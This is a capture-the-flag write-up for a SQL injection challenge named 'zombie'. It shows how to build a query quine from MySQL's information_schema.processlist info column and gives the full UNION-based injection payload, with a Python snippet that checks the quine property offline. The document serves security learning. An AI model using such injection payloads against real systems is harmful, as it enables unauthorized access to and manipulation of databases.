zombie
We are provided with the SQL query:
SELECT pw FROM prob_zombie WHERE pw='{$_GET[pw]}'
Similar to [ouroboros], in this challenge, we have to use a Quine in order to solve it.
However, since ace is being filtered out, we have to find another way of crafting our Quine.
information_schema.processlist table
As noted by this documentation, in MySQL, the information_schema.processlist table is one source of process information which indicates the operations currently being performed by the set of threads executing within the server.
info column
Within this table, the info column contains the statement that is being executed, as shown below.
SELECT info FROM information_schema.processlist
Since the above query is being executed, the value present in the info column of information_schema.processlist would be:
+-------------------------------------------------+
| info |
+-------------------------------------------------+
| SELECT info FROM information_schema.processlist |
+-------------------------------------------------+
As we can see, the SQL query outputs itself, thus acting as a Quine.
Modified Quine
1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist %23
substr(info,locate('1',info),length(info)-locate('1',info)):
- locate('1', info) finds the position of the first occurrence of the character '1' in the info column.
- length(info) gives the total length of the info column's content.
- length(info)-locate('1',info) calculates the length of the substring starting from the first occurrence of '1' to the end of the info content.
- substr(info, locate('1', info), length(info) - locate('1', info)) extracts this substring.
from information_schema.processlist:
- This specifies the table from which the data is being selected. The information_schema.processlist table contains information about the currently running processes in the MySQL database server.
If we provide the following URI parameter:
?pw=1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist %23
The resultant query becomes:
SELECT pw FROM prob_zombie WHERE pw='1' UNION SELECT substr(info,locate('1',info),length(info)-locate('1',info)) FROM information_schema.processlist #'
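The following is an added example, not part of the original write-up: it models MySQL's LOCATE, SUBSTR and LENGTH in Python to check offline that the UNION row equals the submitted pw value. It also shows that the length argument stops one character short of the end of info, which drops the closing ' appended by the original query. It assumes that info holds the full statement text including the trailing comment; the helper names are hypothetical.

```python
# Added illustration: models MySQL's LOCATE/SUBSTR/LENGTH in Python to check
# the quine property of the page's payload. No database is contacted.
from urllib.parse import unquote

TEMPLATE = "SELECT pw FROM prob_zombie WHERE pw='{pw}'"  # query from the page

def locate(needle: str, haystack: str) -> int:
    """MySQL LOCATE(): 1-based position of the first match, 0 if absent."""
    return haystack.find(needle) + 1

def substr(s: str, pos: int, length: int) -> str:
    """MySQL SUBSTR(s, pos, len) for a 1-based, positive start position."""
    return s[pos - 1 : pos - 1 + length] if pos >= 1 and length > 0 else ""

def processlist_info(pw: str) -> str:
    """Assumption: info holds the whole statement, trailing comment included."""
    return TEMPLATE.format(pw=pw)

def union_row(pw: str, extra: int = 0) -> str:
    """Value the injected SELECT yields when run against its own statement.

    extra=1 models taking everything up to the very end of info instead.
    The payload is ASCII, so len() matches MySQL's byte-based LENGTH().
    """
    info = processlist_info(pw)
    start = locate("1", info)
    return substr(info, start, len(info) - start + extra)

# Payload as it appears in the URI on the page; %23 decodes to '#'.
RAW = ("1' UNION SELECT substr(info,locate('1',info),"
       "length(info)-locate('1',info)) FROM information_schema.processlist %23")
PW = unquote(RAW)

if __name__ == "__main__":
    print("info      :", processlist_info(PW))
    print("union row :", union_row(PW))
    print("is quine  :", union_row(PW) == PW)
    print("to the end:", repr(union_row(PW, extra=1)[-3:]))  # ends with #'
```
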